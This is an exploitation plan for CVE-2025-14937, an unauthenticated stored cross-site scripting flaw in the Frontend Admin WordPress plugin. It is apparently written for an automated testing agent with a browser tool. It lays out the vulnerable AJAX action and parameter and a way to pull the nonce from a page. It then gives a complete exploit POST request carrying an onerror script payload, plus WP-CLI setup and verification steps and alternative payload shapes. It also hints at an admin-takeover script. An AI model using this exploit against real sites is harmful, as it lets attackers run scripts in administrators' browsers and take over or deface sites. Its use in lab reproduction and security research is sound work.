Exploitation Research Plan: CVE-2025-14937

1. Vulnerability Summary

The Frontend Admin by DynamiApps plugin (<= 3.28.23) is vulnerable to Unauthenticated Stored Cross-Site Scripting (XSS). The flaw exists within the AJAX handler for the action frontend_admin/forms/update_field. The plugin fails to sanitize the user-supplied input in the acff parameter before storing it in the database and fails to escape it when rendering the data back to users. An attacker can leverage this to inject malicious scripts that execute in the context of any user (including administrators) viewing the affected page or post.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• AJAX Action: frontend_admin/forms/update_field (registered via wp_ajax_nopriv_frontend_admin/forms/update_field)
• Vulnerable Parameter: acff
• Authentication: None (Unauthenticated)
• Preconditions: A post or page must exist where the injected field is displayed, or the plugin must be configured such that an attacker can target a specific post_id.

3. Code Flow (Inferred)

1. Entry Point: An unauthenticated POST request is sent to admin-ajax.php with action=frontend_admin/forms/update_field.
2. Hook Registration: The plugin likely registers the handler:
   add_action( 'wp_ajax_nopriv_frontend_admin/forms/update_field', [ $this, 'update_field' ] );
3. Handler Logic: Inside the update_field method:
   • It retrieves the acff parameter (often an array of field keys and values).
   • It identifies the target post_id and field_key from the request.
   • It calls a function to save the data, likely a wrapper around update_field() (from ACF) or update_post_meta().
4. The Sink (Storage): The data is stored in the wp_postmeta table without wp_kses() or sanitize_text_field().
5. The Sink (Output): When a user visits the post/page, the plugin (or a shortcode) retrieves the value using get_field() or get_post_meta() and echoes it directly into the HTML without esc_html() or esc_attr().

4. Nonce Acquisition Strategy

While the vulnerability is "unauthenticated," the plugin likely implements a nonce check for its AJAX actions.

Step 1: Identify Triggering Content

The plugin's scripts and nonces are usually enqueued when a Frontend Admin form is present. The primary shortcode is likely [acf_frontend_form].

Step 2: Setup Test Page

Create a public page containing the form:

wp post create --post_type=page --post_title="Contact Form" --post_status=publish --post_content='[acf_frontend_form post_id="1"]'

Step 3: Extract Nonce via Browser

1. Navigate to the newly created page.
2. Use the browser_eval tool to find the localized data object. The plugin typically uses frontend_admin_scripts or acf_frontend.
   • Candidate 1: window.frontend_admin_scripts?.nonce
   • Candidate 2: window.acf_frontend?.nonce
   • Candidate 3: Search for any object containing ajax_url.

JS Command:

browser_eval("window.acf_frontend?.nonce || window.frontend_admin_scripts?.nonce")

5. Exploitation Strategy

The goal is to update a post's field with a payload that triggers when an admin views the site.

HTTP Request Details

• Method: POST
• URL: {{base_url}}/wp-admin/admin-ajax.php
• Headers: Content-Type: application/x-www-form-urlencoded
• Body Parameters:
  • action: frontend_admin/forms/update_field
  • nonce: {{extracted_nonce}}
  • post_id: 1 (The ID of the post to deface/infect)
  • acff: This is likely an array. If updating a field named description, the parameter would be acff[description]. If using ACF field keys: acff[field_65a1b2c3d4e5f].
  • Payload: <img src=x onerror=alert(document.domain)> or a more advanced admin-takeover script.

Example Exploit Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=frontend_admin/forms/update_field&nonce=a1b2c3d4e5&post_id=1&acff[your_field_name]=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E

6. Test Data Setup

1. Enable ACF: Ensure Advanced Custom Fields is active (as this plugin is an extension).
2. Create a Field Group: Create a field group with a text field (slug: test_xss_field) assigned to the "Post" post type.
3. Create a Target Post:

   wp post create --post_type=post --post_title="Vulnerable Post" --post_status=publish
   

4. Create Nonce Page:

   wp post create --post_type=page --post_title="Form Page" --post_status=publish --post_content='[acf_frontend_form]'
   

7. Expected Results

• The AJAX request should return a success status (e.g., {"success":true} or HTTP 200).
• When navigating to the "Vulnerable Post" (post_id=1), the browser should execute the alert(document.domain) payload.

8. Verification Steps

After performing the HTTP request, verify the database state using WP-CLI:

# Check the meta value of the target post
wp post meta get 1 test_xss_field

Success Condition: The output shows the raw <img src=x onerror=alert(document.domain)> string, confirming no sanitization occurred.

9. Alternative Approaches

If acff is not a simple array, it might be passed as a JSON string.

• Alternative Payload Structure: acff={"field_key":"<img src=x onerror=alert(1)>"}.
• Field Key Identification: If the field name (slug) doesn't work, inspect the HTML of the form page created in Step 6. Look for inputs with names like acf[...] or acff[...] to find the exact key the plugin expects.
• Post ID targeting: If post_id=1 is restricted, try targeting the post_id of the page where the form is actually rendered.